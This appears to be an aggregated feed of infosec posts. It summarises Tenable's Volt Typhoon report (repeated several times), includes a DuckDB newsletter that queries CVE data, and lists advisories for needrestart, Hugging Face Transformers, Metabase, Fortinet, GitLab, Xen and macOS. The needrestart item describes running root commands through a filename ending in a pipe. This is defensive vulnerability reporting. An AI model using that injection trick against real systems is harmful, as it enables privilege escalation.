##Tenable: Volt Typhoon: U.S. Critical Infrastructure Targeted by State-Sponsored Actors
Tenable explains the tactics, techniques and procedures of the Chinese state-sponsored APT Volt Typhoon. This includes initial access methods, abuse of SOHO devices, living-off-the-land (lotl) tactics, known vulnerabilities exploited, and which of those vulnerabilities have public proofs of concept. Since it's a Tenable blog post, they provide Tenable plugins. TTPs are listed in a table and mapped to MITRE ATT&CK. Resources are listed, but don't include reporting from companies like Lumen's Black Lotus Labs (KV-botnet, post-botnet update, or the Versa Director zero-day exploitation)
#volttyphoon #china #cyberespionage #CVE_2021_27860 #CVE_2021_40539 #CVE_2022_42475 #CVE_2023_27997 #CVE_2024_39717 #threatintel #infosec #cybersecurity #cyberthreatintelligence #CTI
##updated 2023-02-01T05:06:42
4 posts
1 repos
Tenable: Volt Typhoon: U.S. Critical Infrastructure Targeted by State-Sponsored Actors
Tenable explains the tactics, techniques and procedures of the Chinese state-sponsored APT Volt Typhoon. This includes initial access methods, abuse of SOHO devices, living-off-the-land (lotl) tactics, known vulnerabilities exploited, and which of those vulnerabilities have public proofs of concept. Since it's a Tenable blog post, they provide Tenable plugins. TTPs are listed in a table and mapped to MITRE ATT&CK. Resources are listed, but don't include reporting from companies like Lumen's Black Lotus Labs (KV-botnet, post-botnet update, or the Versa Director zero-day exploitation)
#volttyphoon #china #cyberespionage #CVE_2021_27860 #CVE_2021_40539 #CVE_2022_42475 #CVE_2023_27997 #CVE_2024_39717 #threatintel #infosec #cybersecurity #cyberthreatintelligence #CTI
##Tenable: Volt Typhoon: U.S. Critical Infrastructure Targeted by State-Sponsored Actors
Tenable explains the tactics, techniques and procedures of the Chinese state-sponsored APT Volt Typhoon. This includes initial access methods, abuse of SOHO devices, living-off-the-land (lotl) tactics, known vulnerabilities exploited, and which of those vulnerabilities have public proofs of concept. Since it's a Tenable blog post, they provide Tenable plugins. TTPs are listed in a table and mapped to MITRE ATT&CK. Resources are listed, but don't include reporting from companies like Lumen's Black Lotus Labs (KV-botnet, post-botnet update, or the Versa Director zero-day exploitation)
#volttyphoon #china #cyberespionage #CVE_2021_27860 #CVE_2021_40539 #CVE_2022_42475 #CVE_2023_27997 #CVE_2024_39717 #threatintel #infosec #cybersecurity #cyberthreatintelligence #CTI
##Tenable: Volt Typhoon: U.S. Critical Infrastructure Targeted by State-Sponsored Actors
Tenable explains the tactics, techniques and procedures of the Chinese state-sponsored APT Volt Typhoon. This includes initial access methods, abuse of SOHO devices, living-off-the-land (lotl) tactics, known vulnerabilities exploited, and which of those vulnerabilities have public proofs of concept. Since it's a Tenable blog post, they provide Tenable plugins. TTPs are listed in a table and mapped to MITRE ATT&CK. Resources are listed, but don't include reporting from companies like Lumen's Black Lotus Labs (KV-botnet, post-botnet update, or the Versa Director zero-day exploitation)
#volttyphoon #china #cyberespionage #CVE_2021_27860 #CVE_2021_40539 #CVE_2022_42475 #CVE_2023_27997 #CVE_2024_39717 #threatintel #infosec #cybersecurity #cyberthreatintelligence #CTI
##Tenable: Volt Typhoon: U.S. Critical Infrastructure Targeted by State-Sponsored Actors
Tenable explains the tactics, techniques and procedures of the Chinese state-sponsored APT Volt Typhoon. This includes initial access methods, abuse of SOHO devices, living-off-the-land (lotl) tactics, known vulnerabilities exploited, and which of those vulnerabilities have public proofs of concept. Since it's a Tenable blog post, they provide Tenable plugins. TTPs are listed in a table and mapped to MITRE ATT&CK. Resources are listed, but don't include reporting from companies like Lumen's Black Lotus Labs (KV-botnet, post-botnet update, or the Versa Director zero-day exploitation)
#volttyphoon #china #cyberespionage #CVE_2021_27860 #CVE_2021_40539 #CVE_2022_42475 #CVE_2023_27997 #CVE_2024_39717 #threatintel #infosec #cybersecurity #cyberthreatintelligence #CTI
##updated 2023-01-27T05:02:50
1 posts
Please don't "fix" bzip2 CVE-2019-12900
https://inbox.sourceware.org/bzip2-devel/20241108214034.GC8315@gnu.wildebeest.org/
##updated 2023-01-27T05:02:29
1 posts
Quacking In The [g]Sheets; My🦆Server; Feet-First 🦆 DB (a.k.a. “DuckDB HTTP Client Extension”)
My day outside of Reno started early, Friday, and we were chased by black helicopters (not joking), so — as expected — no Friday normal Drop.
But things are QUACKING in DuckDB land, and I just had to get a Bonus 🦆 Drop out about them before more hiking this weekend.
TL;DR
(This is an AI-generated summary of today’s Drop using Ollama + llama 3.2 and a custom Modelfile.)
Quacking In The [g]Sheets
The DuckDB GSheets extension (GH) enables seamless integration between DuckDB’s analytical capabilities and Google Sheets, bridging a critical gap between collaborative spreadsheet workflows and robust data analysis.
The extension provides straightforward (though fairly basic, for now) SQL syntax for both reading and writing Google Sheets data. You can query sheets using either full URLs or spreadsheet IDs, with options to specify sheet names and handle header rows. Authentication can be handled through browser-based OAuth or via Google API access tokens.
If you work in an environment where domain experts collaborate with datascience/analysis teams, Google Sheets (et al.) often serves as an accessible interface for non-technical team members to maintain and update data that feeds into analytical workflows. For example, product managers can maintain feature flags, marketing teams can update campaign metadata, and operations teams can manage configuration data – all through the familiar spreadsheet interface rather than dealing with JSON, YAML, or raw text files.
Setting up the extension requires installing it from the community repository (you need to be on a fairly recent release of DuckDb for this to work):
INSTALL gsheets FROM community;LOAD gsheets;
Basic usage patterns include:
-- Read from a sheetFROM read_gsheet('spreadsheet_url_or_id');-- Write to a sheetCOPY table_name TO 'spreadsheet_url_or_id' (FORMAT gsheet);
The section header image is from this gsheet which is (my public copy of) a “Database of network device CVEs” provided by Sophos from a five-year massively cool (but evil) hack of dozens of corporations around the globe. It is possible this sheet might be updated regularly, especially the “GreyNoise (#of Malicious IPs Scanning)
” column (that’s my $WORK place). If that is the case it may make more sense to access it directly than to have some process to download it somewhere regularly.
I made a perma-copy of my OAuth’d access token:
LOAD gsheets;CREATE PERSISTENT SECRET ( TYPE gsheet, PROVIDER access_token, TOKEN 'yOUrToK3nH3re');
And, now we can look at the “schema”:
$ duckdb -json -c " LOAD gsheets; FROM read_gsheet( 'https://docs.google.com/spreadsheets/d/1TbBX1YkZ4GED1qU7Owcp2AIiRhcGzLEAFCEopq7smMg/edit?gid=1482976550#gid=1482976550', sheet = 'Sheet1' ) LIMIT 1" | jq[ { "Vendor": "Sophos", "Title": "Sophos SFOS SQL Injection Vulnerability", "CVE": "CVE-2020-12271", "CVSS": 9.8, "Date of NVD publication": "4/27/20", "Date of vendor advisory": "Unknown", "Used in ransomware attacks?": "Known", "Summary": "Sophos Firewall operating system (SFOS) firmware contains a SQL injection vulnerability when configured with either the administration (HTTPS) service or the User Portal is exposed on the WAN zone. Successful exploitation may cause remote code execution to exfiltrate usernames and hashed passwords for the local device admin(s), portal admins, and user accounts used for remote access (but not external Active Directory or LDAP passwords).", "Date added to KEV Catalog": "11/3/21", "Vendor Advisory": "https://community.sophos.com/kb/en-us/135412", "Date of Known Exploitation": "Apr-20", "Threat actor": "Unknown", "Targets": "Telecommunication,Construction,Transportation,Education,Manufacturing,Auto,Airline,Pharmaceuticals,Retail,Insurance,Legal", "Metasploit Module": "N", "GreyNoise (#of Malicious IPs Scanning)": 0.0, "Number of vulnerable devices": "?", "Number of impacted devices": "?", "GreyNoise Link": "https://viz.greynoise.io/query/%0A%20%20CVE-2020-12271" }]
And, perform normal ops on it:
$ duckdb -table -c "LOAD gsheets;FROM read_gsheet( 'https://docs.google.com/spreadsheets/d/1TbBX1YkZ4GED1qU7Owcp2AIiRhcGzLEAFCEopq7smMg/edit?gid=1482976550#gid=1482976550', sheet='Sheet1')SELECT Vendor, COUNT(Vendor) AS ctGROUP BY VendorORDER BY 2 DESC"+---------------------+----+| Vendor | ct |+---------------------+----+| Cisco | 72 || D-Link | 19 || Ivanti | 18 || Citrix | 16 || Fortinet | 13 || SonicWall | 10 || Zyxel | 9 || NETGEAR | 8 || Juniper | 6 || F5 | 6 || PANW | 5 || Sophos | 5 || DrayTek | 3 || Tenda | 3 || TP-Link | 2 || MikroTik | 2 || Dasan | 2 || Check Point | 1 || D-Link and TRENDnet | 1 || Barracuda | 1 || Netis | 1 || FatPipe | 1 || Arcadyan | 1 || Sumavision | 1 |+---------------------+----+
The extension has some notable constraints to consider:
These limitations aside, the DuckDB GSheets extension will will (eventually) provide a robust bridge between collaborative data maintenance and analytical processing, making it easier for organizations to maintain their data workflows across technical and non-technical team members.
The code is very readable, but the extension is also a tad buggy at the moment (you may not always be able to get to a particular sheet, I have not debugged why, yet); so, this might be a good project to PR into if you have some specific functionality you need, but is presently missing, like support for a subset of the bonkers number of parameters you can use when reading CSV files in DuckDB.
My🦆Server
MyDuck Server is a nascent bridge between MySQL and DuckDB with a goal of enabling high-performance analytics while maintaining MySQL compatibility. It functions by storing data in DuckDB’s OLAP-optimized format while presenting a MySQL-compatible interface, allowing queries to execute [up to 1,000x] faster than traditional MySQL configurations.
The system operates through dual interfaces — a MySQL wire protocol on port 13306
(for traditional MySQL-style queries) and a PostgreSQL-compatible interface on port 15432
. (for direct DuckDB SQL execution).
I’m including this mostly for visibility, since I do not run MySQL/MariaDB, and the README — while a tad verbose — is also not super helpful in terms of real examples.
If you are a MySQL/MariaDB shop, this might be something to keep on the radar.
Feet-First 🦆 DB (a.k.a. “DuckDB HTTP Client Extension”)
Photo by Samson Andreea on Pexels.comThe DuckDB HTTP Client extension enables direct HTTP GET and POST requests from within DuckDB queries. After installing and loading via the community extensions repository, you can make HTTP requests that return results directly into DuckDB’s query processing pipeline.
By now, you should know how to install/load extensions:
INSTALL http_client FROM community;LOAD http_client;
The extension provides two main functions: http_get()
for GET requests and http_post()
for POST requests with optional headers and parameters. The results are returned as structured data that can be further processed using DuckDB’s SQL capabilities.
The extension returns responses in a consistent format that includes:
The response data can be immediately parsed and transformed using DuckDB’s built-in JSON processing capabilities and integrated into larger analytical queries.
The README provides a practical example of this extension’s utility is its ability to interact with spatial data APIs. When combined with DuckDB’s spatial extension, you can fetch GeoJSON data via HTTP and directly process it as geometric objects. This enables seamless integration of remote spatial data sources into DuckDB analytical workflows.
We can show another one, though. Let’s say we want to use DuckDB to analyze a day’s worth of NVD CVE records.
We can grab all of the CVEs for one day and save a temp copy in memory as a table (this reduces the number of times we need to fetch from the API):
CREATE TABLE yesterday AS (WITH __req AS ( SELECT http_get( 'https://services.nvd.nist.gov/rest/json/cves/2.0/?pubStartDate=2024-11-08T00:00:00.000&pubEndDate=2024-11-08T23:59:59.000' ) AS res ), __res AS ( SELECT UNNEST( from_json(((res->>'body')::JSON)->'vulnerabilities', '["json"]') ) AS cves FROM __req ) FROM __res);
We’ll look at that in a second, but be aware that some APIs paginate (NVD does at 2,000 records) and this extension won’t handle that, but you can work around it if you combine this method with some shell scripting.
What that query returns is an array of deeply nexted JSON records:
FROM yesterday LIMIT 3;┌──────────────────────────────────────────────────────────────────────────────┐│ cves ││ json │├──────────────────────────────────────────────────────────────────────────────┤│ {"cve":{"id":"CVE-2024-47072","sourceIdentifier":"security-advisories@gith… ││ {"cve":{"id":"CVE-2024-51987","sourceIdentifier":"security-advisories@gith… ││ {"cve":{"id":"CVE-2024-51998","sourceIdentifier":"security-advisories@gith… │└──────────────────────────────────────────────────────────────────────────────┘
But DuckDB let’s us work with JSON pretty seamlessly.
It looks like the NVD contractors are milking their contract for all its worth:
FROM yesterdaySELECT cves->>'cve'->>'vulnStatus' AS vulnStatus, COUNT() AS ct, ROUND(COUNT() * 100.0 / SUM(COUNT()) OVER (), 2) AS pctGROUP BY ALL;┌─────────────────────┬───────┬────────┐│ vulnStatus │ ct │ pct ││ varchar │ int64 │ double │├─────────────────────┼───────┼────────┤│ Awaiting Analysis │ 83 │ 65.87 ││ Received │ 34 │ 26.98 ││ Undergoing Analysis │ 9 │ 7.14 │└─────────────────────┴───────┴────────┘
You can add headers, and use getenv(var)
to fill in things like API keys.
This is a super fun extension to play with!
FIN
Remember, you can follow and interact with the full text of The Daily Drop’s free posts on Mastodon via @dailydrop.hrbrmstr.dev@dailydrop.hrbrmstr.dev
☮️
It has been 0 days since I've had to tap the sign:
https://infosec.exchange/@ckure/111970971640286655
"CVE-2024-10224: local attackers can execute arbitrary shell commands as root by tricking needrestart into open()ing a filename of the form "commands|" (technically, this vulnerability is in Perl's ScanDeps module, but it is unclear whether this module was ever meant to operate on attacker-controlled files or not)."
https://www.qualys.com/2024/11/19/needrestart/needrestart.txt
##It has been 0 days since I've had to tap the sign:
https://infosec.exchange/@ckure/111970971640286655
"CVE-2024-10224: local attackers can execute arbitrary shell commands as root by tricking needrestart into open()ing a filename of the form "commands|" (technically, this vulnerability is in Perl's ScanDeps module, but it is unclear whether this module was ever meant to operate on attacker-controlled files or not)."
https://www.qualys.com/2024/11/19/needrestart/needrestart.txt
##[ZDI-24-1515|CVE-2024-11394] (0Day) Hugging Face Transformers Trax Model Deserialization of Untrusted Data Remote Code Execution Vulnerability (CVSS 8.8; Credit: The_Kernel_Panic) https://www.zerodayinitiative.com/advisories/ZDI-24-1515/
##ZDI-24-1514|CVE-2024-11393] (0Day) Hugging Face Transformers MaskFormer Model Deserialization of Untrusted Data Remote Code Execution Vulnerability (CVSS 8.8; Credit: The_Kernel_Panic) https://www.zerodayinitiative.com/advisories/ZDI-24-1514/
##Redis CVE-2024-31449: How to Reproduce and Mitigate the Vulnerability https://redrays.io/blog/redis-cve-2024-31449-how-to-reproduce-and-mitigate-the-vulnerability/
##Additional Fortinet security advisories:
No mention of exploitation.
#Fortinet #PatchTuesday #CVE #vulnerability #infosec #cybersecurity
##GitLab security advisory: GitLab Patch Release: 17.5.2, 17.4.4, 17.3.7
No mention of exploitation.
#GitLab #PatchTuesday #CVE #vulnerability #infosec #cybersecurity
##CVE ID: CVE-2021-41277
Vendor: Metabase
Product: Metabase
Date Added: 2024-11-12
Vulnerability: Metabase GeoJSON API Local File Inclusion Vulnerability
Notes: https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr ; https://nvd.nist.gov/vuln/detail/CVE-2021-41277
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2021-41277
CISA: CISA Adds Five Known Exploited Vulnerabilities to Catalog
Hot off the press!
#cisa #kev #knownexploitedvulnerabilitiescatalog #cisakev #vulnerability #cve #eitw #activeexploitation #infosec #cybersecurity
##Xen Security Advisory 464 v2 (CVE-2024-45819) - libxl leaks data to PVH guests via ACPI tables
##New blog post dives deep into a lesser-known macOS attack surface, revealing over 10 fresh sandbox escape vulnerabilities, including CVE-2023-27944, CVE-2023-32414, and CVE-2024-27864. The overlooked XPC services in system frameworks have opened up critical bypass paths for sandbox and SIP restrictions.
https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/
##